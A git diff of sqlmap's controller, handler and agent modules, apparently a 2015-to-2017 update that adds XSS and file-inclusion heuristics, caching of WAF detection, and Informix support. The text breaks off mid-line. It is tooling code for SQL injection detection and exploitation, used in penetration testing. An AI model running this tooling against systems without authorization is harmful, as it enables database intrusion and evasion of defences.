Request.queryPage(payload, place, content=True, raise404=False) + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) + kb.heuristicPage = page kb.heuristicMode = False parseFilePaths(page) @@ -875,7 +985,7 @@ def heuristicCheckSqlInjection(place, parameter): if not result: randStr = randomStr() - payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix) + payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix) payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE) casting = Request.queryPage(payload, place, raise404=False) @@ -889,7 +999,7 @@ def heuristicCheckSqlInjection(place, parameter): if kb.ignoreCasted is None: message = "do you want to skip those kind of cases (and save scanning time)? %s " % ("[Y/n]" if conf.multipleTargets else "[y/N]") - kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N').upper() != 'N' + kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True) elif result: infoMsg += "be injectable" @@ -903,18 +1013,26 @@ def heuristicCheckSqlInjection(place, parameter): kb.heuristicMode = True - value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr()) + randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH) + value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2) payload = "%s%s%s" % (prefix, "'%s" % value, suffix) payload = agent.payload(place, parameter, newValue=payload) - page, _ = Request.queryPage(payload, place, content=True, raise404=False) + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place - if value in (page or ""): + if value.lower() in (page or "").lower(): infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType - infoMsg += "'%s' might be vulnerable to XSS attacks" % parameter + infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter logger.info(infoMsg) + for match in re.finditer(FI_ERROR_REGEX, page or ""): + if randStr1.lower() in match.group(0).lower(): + infoMsg = "heuristic (FI) test shows that %s parameter " % paramType + infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter + logger.info(infoMsg) + break + kb.heuristicMode = False return kb.heuristicTest @@ -974,12 +1092,22 @@ def checkDynamicContent(firstPage, secondPage): logger.critical(warnMsg) return - seqMatcher = getCurrentThreadData().seqMatcher - seqMatcher.set_seq1(firstPage) - seqMatcher.set_seq2(secondPage) + if firstPage and secondPage and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (firstPage, secondPage)): + ratio = None + else: + try: + seqMatcher = getCurrentThreadData().seqMatcher + seqMatcher.set_seq1(firstPage) + seqMatcher.set_seq2(secondPage) + ratio = seqMatcher.quick_ratio() + except MemoryError: + ratio = None + + if ratio is None: + kb.skipSeqMatcher = True # In case of an intolerable difference turn on dynamicity removal engine - if seqMatcher.quick_ratio() <= UPPER_RATIO_BOUND: + elif ratio <= UPPER_RATIO_BOUND: findDynamicContent(firstPage, secondPage) count = 0 @@ -998,7 +1126,7 @@ def checkDynamicContent(firstPage, secondPage): warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) - secondPage, _ = Request.queryPage(content=True) + secondPage, _, _ = Request.queryPage(content=True) findDynamicContent(firstPage, secondPage) def checkStability(): @@ -1021,7 +1149,7 @@ def checkStability(): delay = max(0, min(1, delay)) time.sleep(delay) - secondPage, _ = Request.queryPage(content=True, raise404=False) + secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False) if kb.redirectChoice: return None @@ -1049,19 +1177,19 @@ def checkStability(): logger.warn(warnMsg) message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] " - test = readInput(message, default="C") + choice = readInput(message, default='C').upper() - if test and test[0] in ("q", "Q"): + if choice == 'Q': raise SqlmapUserQuitException - elif test and test[0] in ("s", "S"): + elif choice == 'S': showStaticWords(firstPage, secondPage) message = "please enter value for parameter 'string': " - test = readInput(message) + string = readInput(message) - if test: - conf.string = test + if string: + conf.string = string if kb.nullConnection: debugMsg = "turning off NULL connection " @@ -1073,12 +1201,12 @@ def checkStability(): errMsg = "Empty value supplied" raise SqlmapNoneDataException(errMsg) - elif test and test[0] in ("r", "R"): + elif choice == 'R': message = "please enter value for parameter 'regex': " - test = readInput(message) + regex = readInput(message) - if test: - conf.regex = test + if regex: + conf.regex = regex if kb.nullConnection: debugMsg = "turning off NULL connection " @@ -1103,7 +1231,7 @@ def checkString(): infoMsg += "target URL page content" logger.info(infoMsg) - page, headers = Request.queryPage(content=True) + page, headers, _ = Request.queryPage(content=True) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if conf.string not in rawResponse: @@ -1122,7 +1250,7 @@ def checkRegexp(): infoMsg += "the target URL page content" logger.info(infoMsg) - page, headers = Request.queryPage(content=True) + page, headers, _ = Request.queryPage(content=True) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if not re.search(conf.regexp, rawResponse, re.I | re.M): @@ -1139,12 +1267,20 @@ def checkWaf(): Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse """ - if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)): + if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)): return None - dbmMsg = "heuristically checking if the target is protected by " - dbmMsg += "some kind of WAF/IPS/IDS" - logger.debug(dbmMsg) + _ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True) + if _ is not None: + if _: + warnMsg = "previous heuristics detected that the target " + warnMsg += "is protected by some kind of WAF/IPS/IDS" + logger.critical(warnMsg) + return _ + + infoMsg = "checking if the target is protected by " + infoMsg += "some kind of WAF/IPS/IDS" + logger.info(infoMsg) retVal = False payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) @@ -1152,12 +1288,16 @@ def checkWaf(): value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload)) + pushValue(conf.timeout) + conf.timeout = IDS_WAF_CHECK_TIMEOUT + try: retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO except SqlmapConnectionException: retVal = True finally: kb.matchRatio = None + conf.timeout = popValue() if retVal: warnMsg = "heuristics detected that the target " @@ -1167,17 +1307,25 @@ def checkWaf(): if not conf.identifyWaf: message = "do you want sqlmap to try to detect backend " message += "WAF/IPS/IDS? [y/N] " - output = readInput(message, default="N") - if output and output[0] in ("Y", "y"): + if readInput(message, default='N', boolean=True): conf.identifyWaf = True + if conf.timeout == defaults.timeout: + logger.warning("dropping timeout to %d seconds (i.e. '--timeout=%d')" % (IDS_WAF_CHECK_TIMEOUT, IDS_WAF_CHECK_TIMEOUT)) + conf.timeout = IDS_WAF_CHECK_TIMEOUT + + hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True) + return retVal def identifyWaf(): if not conf.identifyWaf: return None + if not kb.wafFunctions: + setWafFunctions() + kb.testMode = True infoMsg = "using WAF scripts to detect " @@ -1201,36 +1349,38 @@ def identifyWaf(): kb.redirectChoice = popValue() return page or "", headers or {}, code - retVal = False + retVal = [] for function, product in kb.wafFunctions: try: - logger.debug("checking for WAF/IDS/IPS product '%s'" % product) + logger.debug("checking for WAF/IPS/IDS product '%s'" % product) found = function(_) except Exception, ex: errMsg = "exception occurred while running " - errMsg += "WAF script for '%s' ('%s')" % (product, ex) + errMsg += "WAF script for '%s' ('%s')" % (product, getSafeExString(ex)) logger.critical(errMsg) found = False if found: - retVal = product - break + errMsg = "WAF/IPS/IDS identified as '%s'" % product + logger.critical(errMsg) + + retVal.append(product) if retVal: - errMsg = "WAF/IDS/IPS identified '%s'. Please " % retVal - errMsg += "consider usage of tamper scripts (option '--tamper')" - logger.critical(errMsg) - message = "are you sure that you want to " message += "continue with further target testing? [y/N] " - output = readInput(message, default="N") + choice = readInput(message, default='N', boolean=True) - if output and output[0] not in ("Y", "y"): + if not conf.tamper: + warnMsg = "please consider usage of tamper scripts (option '--tamper')" + singleTimeWarnMessage(warnMsg) + + if not choice: raise SqlmapUserQuitException else: - warnMsg = "no WAF/IDS/IPS product has been identified" + warnMsg = "WAF/IPS/IDS product hasn't been identified" logger.warn(warnMsg) kb.testType = None @@ -1258,7 +1408,7 @@ def checkNullConnection(): if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}): kb.nullConnection = NULLCONNECTION.HEAD - infoMsg = "NULL connection is supported with HEAD header" + infoMsg = "NULL connection is supported with HEAD method (Content-Length)" logger.info(infoMsg) else: page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"}) @@ -1266,7 +1416,7 @@ def checkNullConnection(): if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}): kb.nullConnection = NULLCONNECTION.RANGE - infoMsg = "NULL connection is supported with GET header " + infoMsg = "NULL connection is supported with GET method (Range)" infoMsg += "'%s'" % kb.nullConnection logger.info(infoMsg) else: @@ -1278,8 +1428,8 @@ def checkNullConnection(): infoMsg = "NULL connection is supported with 'skip-read' method" logger.info(infoMsg) - except SqlmapConnectionException, errMsg: - errMsg = getUnicode(errMsg) + except SqlmapConnectionException, ex: + errMsg = getSafeExString(ex) raise SqlmapConnectionException(errMsg) finally: @@ -1298,7 +1448,7 @@ def checkConnection(suppressOutput=False): raise SqlmapConnectionException(errMsg) except socket.error, ex: errMsg = "problem occurred while " - errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message) + errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex)) raise SqlmapConnectionException(errMsg) if not suppressOutput and not conf.dummy and not conf.offline: @@ -1307,7 +1457,7 @@ def checkConnection(suppressOutput=False): try: kb.originalPageTime = time.time() - page, _ = Request.queryPage(content=True, noteResponseTime=False) + page, headers, _ = Request.queryPage(content=True, noteResponseTime=False) kb.originalPage = kb.pageTemplate = page kb.errorIsNone = False @@ -1326,7 +1476,7 @@ def checkConnection(suppressOutput=False): else: kb.errorIsNone = True - except SqlmapConnectionException, errMsg: + except SqlmapConnectionException, ex: if conf.ipv6: warnMsg = "check connection to a provided " warnMsg += "IPv6 address with a tool like ping6 " @@ -1336,14 +1486,14 @@ def checkConnection(suppressOutput=False): singleTimeWarnMessage(warnMsg) if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )): - errMsg = getUnicode(errMsg) + errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.multipleTargets: return False msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] " - if readInput(msg, default="Y") not in ("n", "N"): + if readInput(msg, default='Y', boolean=True): raise SqlmapSilentQuitException else: kb.ignoreNotFound = True @@ -1352,5 +1502,12 @@ def checkConnection(suppressOutput=False): return True +def checkInternet(): + content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0] + return CHECK_INTERNET_VALUE in (content or "") + def setVerbosity(): # Cross-linked function raise NotImplementedError + +def setWafFunctions(): # Cross-linked function + raise NotImplementedError diff --git a/lib/controller/controller.py b/lib/controller/controller.py index d5793767c..777d8ba6e 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re +import time from lib.controller.action import action from lib.controller.checks import checkSqlInjection @@ -15,6 +16,7 @@ from lib.controller.checks import checkStability from lib.controller.checks import checkString from lib.controller.checks import checkRegexp from lib.controller.checks import checkConnection +from lib.controller.checks import checkInternet from lib.controller.checks import checkNullConnection from lib.controller.checks import checkWaf from lib.controller.checks import heuristicCheckSqlInjection @@ -24,7 +26,7 @@ from lib.core.common import dataToStdout from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import getPublicTypeMembers -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import intersect @@ -45,6 +47,7 @@ from lib.core.enums import CONTENT_TYPE from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTPMETHOD +from lib.core.enums import NOTE from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapBaseException @@ -64,7 +67,6 @@ from lib.core.settings import REFERER_ALIASES from lib.core.settings import USER_AGENT_ALIASES from lib.core.target import initTargetEnv from lib.core.target import setupTargetEnv -from thirdparty.pagerank.pagerank import get_pagerank def _selectInjection(): """ @@ -116,11 +118,11 @@ def _selectInjection(): message += "\n" message += "[q] Quit" - select = readInput(message, default="0") + choice = readInput(message, default='0').upper() - if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0: - index = int(select) - elif select[0] in ("Q", "q"): + if choice.isdigit() and int(choice) < len(kb.injections) and int(choice) >= 0: + index = int(choice) + elif choice == 'Q': raise SqlmapUserQuitException else: errMsg = "invalid choice" @@ -140,7 +142,7 @@ def _formatInjection(inj): if inj.place == PLACE.CUSTOM_HEADER: payload = payload.split(',', 1)[1] if stype == PAYLOAD.TECHNIQUE.UNION: - count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1 + count = re.sub(r"(?i)(\(.+\))|(\blimit[^a-z]+)", "", sdata.payload).count(',') + 1 title = re.sub(r"\d+ to \d+", str(count), title) vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) if count == 1: @@ -161,10 +163,11 @@ def _showInjections(): else: header = "sqlmap resumed the following injection point(s) from stored session" - if hasattr(conf, "api"): + if conf.api: + conf.dumper.string("", {"url": conf.url, "query": conf.parameters.get(PLACE.GET), "data": conf.parameters.get(PLACE.POST)}, content_type=CONTENT_TYPE.TARGET) conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES) else: - data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n") + data = "".join(set(_formatInjection(_) for _ in kb.injections)).rstrip("\n") conf.dumper.string(header, data) if conf.tamper: @@ -182,8 +185,8 @@ def _randomFillBlankFields(value): if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value): message = "do you want to fill blank fields with random values? [Y/n] " - test = readInput(message, default="Y") - if not test or test[0] in ("y", "Y"): + + if readInput(message, default='Y', boolean=True): for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal): item = match.group("result") if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item): @@ -209,9 +212,8 @@ def _saveToHashDB(): _[key].data.update(injection.data) hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True) - _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or set() - _.update(kb.absFilePaths) - hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, _, True) + _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) + hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True) if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS): hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True) @@ -224,25 +226,25 @@ def _saveToResultsFile(): return results = {} - techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE))) + techniques = dict((_[1], _[0]) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE)) - for inj in kb.injections: - if inj.place is None or inj.parameter is None: + for injection in kb.injections + kb.falsePositives: + if injection.place is None or injection.parameter is None: continue - key = (inj.place, inj.parameter) + key = (injection.place, injection.parameter, ';'.join(injection.notes)) if key not in results: results[key] = [] - results[key].extend(inj.data.keys()) + results[key].extend(injection.data.keys()) for key, value in results.items(): - place, parameter = key - line = "%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), os.linesep) + place, parameter, notes = key + line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep) conf.resultsFP.writelines(line) if not results: - line = "%s,,,%s" % (conf.url, os.linesep) + line = "%s,,,,%s" % (conf.url, os.linesep) conf.resultsFP.writelines(line) def start(): @@ -276,6 +278,21 @@ def start(): for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets: try: + + if conf.checkInternet: + infoMsg = "[INFO] checking for Internet connection" + logger.info(infoMsg) + + if not checkInternet(): + warnMsg = "[%s] [WARNING] no connection detected" % time.strftime("%X") + dataToStdout(warnMsg) + + while not checkInternet(): + dataToStdout('.') + time.sleep(5) + + dataToStdout("\n") + conf.url = targetUrl conf.method = targetMethod.upper() if targetMethod else targetMethod conf.data = targetData @@ -305,7 +322,9 @@ def start(): message = "SQL injection vulnerability has already been detected " message += "against '%s'. Do you want to skip " % conf.hostname message += "further tests involving it? [Y/n]" - kb.skipVulnHost = readInput(message, default="Y").upper() != 'N' + + kb.skipVulnHost = readInput(message, default='Y', boolean=True) + testSqlInj = not kb.skipVulnHost if not testSqlInj: @@ -316,10 +335,10 @@ def start(): if conf.multipleTargets: hostCount += 1 - if conf.forms: - message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl) + if conf.forms and conf.method: + message = "[#%d] form:\n%s %s" % (hostCount, conf.method, targetUrl) else: - message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "") + message = "URL %d:\n%s %s" % (hostCount, HTTPMETHOD.GET, targetUrl) if conf.cookie: message += "\nCookie: %s" % conf.cookie @@ -327,14 +346,18 @@ def start(): if conf.data is not None: message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "") - if conf.forms: + if conf.forms and conf.method: if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1: continue message += "\ndo you want to test this form? [Y/n/q] " - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): + if choice == 'N': + continue + elif choice == 'Q': + break + else: if conf.method != HTTPMETHOD.GET: message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "") conf.data = readInput(message, default=conf.data) @@ -352,21 +375,14 @@ def start(): parseTargetUrl() - elif test[0] in ("n", "N"): - continue - elif test[0] in ("q", "Q"): - break - else: message += "\ndo you want to test this URL? [Y/n/q]" - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): - pass - elif test[0] in ("n", "N"): + if choice == 'N': dataToStdout(os.linesep) continue - elif test[0] in ("q", "Q"): + elif choice == 'Q': break infoMsg = "testing URL '%s'" % targetUrl @@ -421,6 +437,7 @@ def start(): skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None)) skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None)) + skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None)) skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True)) skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True)) @@ -463,7 +480,13 @@ def start(): infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter) logger.info(infoMsg) - elif parameter in conf.skip: + elif parameter in conf.skip or kb.postHint and parameter.split(' ')[-1] in conf.skip: + testSqlInj = False + + infoMsg = "skipping %s parameter '%s'" % (paramType, parameter) + logger.info(infoMsg) + + elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)): testSqlInj = False infoMsg = "skipping %s parameter '%s'" % (paramType, parameter) @@ -486,7 +509,7 @@ def start(): check = checkDynParam(place, parameter, value) if not check: - warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter) + warnMsg = "%s parameter '%s' does not appear to be dynamic" % (paramType, parameter) logger.warn(warnMsg) if conf.skipStatic: @@ -520,24 +543,30 @@ def start(): injection = checkSqlInjection(place, parameter, value) proceed = not kb.endDetection + injectable = False - if injection is not None and injection.place is not None: - kb.injections.append(injection) + if getattr(injection, "place", None) is not None: + if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes: + kb.falsePositives.append(injection) + else: + injectable = True - # In case when user wants to end detection phase (Ctrl+C) - if not proceed: - break + kb.injections.append(injection) - msg = "%s parameter '%s' " % (injection.place, injection.parameter) - msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] " - test = readInput(msg, default="N") + # In case when user wants to end detection phase (Ctrl+C) + if not proceed: + break - if test[0] not in ("y", "Y"): - proceed = False - paramKey = (conf.hostname, conf.path, None, None) - kb.testedParams.add(paramKey) - else: - warnMsg = "%s parameter '%s' is not " % (paramType, parameter) + msg = "%s parameter '%s' " % (injection.place, injection.parameter) + msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] " + + if not readInput(msg, default='N', boolean=True): + proceed = False + paramKey = (conf.hostname, conf.path, None, None) + kb.testedParams.add(paramKey) + + if not injectable: + warnMsg = "%s parameter '%s' does not seem to be " % (paramType, parameter) warnMsg += "injectable" logger.warn(warnMsg) @@ -585,24 +614,24 @@ def start(): if not conf.string and not conf.notString and not conf.regexp: errMsg += " Also, you can try to rerun by providing " errMsg += "either a valid value for option '--string' " - errMsg += "(or '--regexp')" + errMsg += "(or '--regexp')." elif conf.string: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--string' as perhaps the string you " errMsg += "have chosen does not match " - errMsg += "exclusively True responses" + errMsg += "exclusively True responses." elif conf.regexp: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--regexp' as perhaps the regular " errMsg += "expression that you have chosen " - errMsg += "does not match exclusively True responses" + errMsg += "does not match exclusively True responses." if not conf.tamper: errMsg += " If you suspect that there is some kind of protection mechanism " errMsg += "involved (e.g. WAF) maybe you could retry " errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')" - raise SqlmapNotVulnerableException(errMsg) + raise SqlmapNotVulnerableException(errMsg.rstrip('.')) else: # Flush the flag kb.testMode = False @@ -615,9 +644,7 @@ def start(): if kb.injection.place is not None and kb.injection.parameter is not None: if conf.multipleTargets: message = "do you want to exploit this SQL injection? [Y/n] " - exploit = readInput(message, default="Y") - - condition = not exploit or exploit[0] in ("y", "Y") + condition = readInput(message, default='Y', boolean=True) else: condition = True @@ -630,13 +657,11 @@ def start(): logger.warn(warnMsg) message = "do you want to skip to the next target in list? [Y/n/q]" - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): - pass - elif test[0] in ("n", "N"): + if choice == 'N': return False - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: raise @@ -648,11 +673,13 @@ def start(): raise except SqlmapBaseException, ex: - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) if conf.multipleTargets: + _saveToResultsFile() + errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL") - logger.error(errMsg) + logger.error(errMsg.lstrip(", ")) else: logger.critical(errMsg) return False @@ -669,9 +696,10 @@ def start(): if kb.dataOutputFlag and not conf.multipleTargets: logger.info("fetched data logged to text files under '%s'" % conf.outputPath) - if conf.multipleTargets and conf.resultsFilename: - infoMsg = "you can find results of scanning in multiple targets " - infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename - logger.info(infoMsg) + if conf.multipleTargets: + if conf.resultsFilename: + infoMsg = "you can find results of scanning in multiple targets " + infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename + logger.info(infoMsg) return True diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 471070b1b..98f4dab40 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -1,13 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.common import Backend from lib.core.data import conf -from lib.core.data import logger +from lib.core.data import kb from lib.core.dicts import DBMS_DICT from lib.core.enums import DBMS from lib.core.settings import MSSQL_ALIASES @@ -21,6 +21,7 @@ from lib.core.settings import MAXDB_ALIASES from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import INFORMIX_ALIASES from lib.utils.sqlalchemy import SQLAlchemy from plugins.dbms.mssqlserver import MSSQLServerMap @@ -45,6 +46,8 @@ from plugins.dbms.db2 import DB2Map from plugins.dbms.db2.connector import Connector as DB2Conn from plugins.dbms.hsqldb import HSQLDBMap from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn +from plugins.dbms.informix import InformixMap +from plugins.dbms.informix.connector import Connector as InformixConn def setHandler(): """ @@ -64,26 +67,19 @@ def setHandler(): (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), + (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), ] - _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items) + _ = max(_ if (Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items) if _: items.remove(_) items.insert(0, _) for dbms, aliases, Handler, Connector in items: - if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases: - debugMsg = "skipping test for %s" % dbms - logger.debug(debugMsg) - continue - handler = Handler() conf.dbmsConnector = Connector() if conf.direct: - logger.debug("forcing timeout to 10 seconds") - conf.timeout = 10 - dialect = DBMS_DICT[dbms][3] if dialect: @@ -101,7 +97,12 @@ def setHandler(): conf.dbmsConnector.connect() if handler.checkDbms(): - conf.dbmsHandler = handler + if kb.resolutionDbms: + conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]() + else: + conf.dbmsHandler = handler + + conf.dbmsHandler._dbms = dbms break else: conf.dbmsConnector = None diff --git a/lib/core/__init__.py b/lib/core/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/core/__init__.py +++ b/lib/core/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/agent.py b/lib/core/agent.py index 556f379a9..e678627d4 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -17,6 +17,7 @@ from lib.core.common import isTechniqueAvailable from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage from lib.core.common import splitFields from lib.core.common import unArrayizeValue @@ -34,12 +35,15 @@ from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BOUNDARY_BACKSLASH_MARKER +from lib.core.settings import BOUNDED_INJECTION_MARKER from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import GENERIC_SQL_COMMENT +from lib.core.settings import NULL from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import REPLACEMENT_MARKER +from lib.core.settings import SLEEP_TIME_MARKER from lib.core.unescaper import unescaper class Agent(object): @@ -59,7 +63,7 @@ class Agent(object): if Backend.getIdentifiedDbms() in (DBMS.ORACLE,): # non-standard object(s) make problems to a database connector while returned (e.g. XMLTYPE) _, _, _, _, _, _, fieldsToCastStr, _ = self.getFields(query) - for field in fieldsToCastStr.split(","): + for field in fieldsToCastStr.split(','): query = query.replace(field, self.nullAndCastField(field)) if kb.tamperFunctions: @@ -94,9 +98,12 @@ class Agent(object): paramDict = conf.paramDict[place] origValue = getUnicode(paramDict[parameter]) - if place == PLACE.URI: + if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue: paramString = origValue - origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0] + if place == PLACE.URI: + origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0] + else: + origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in 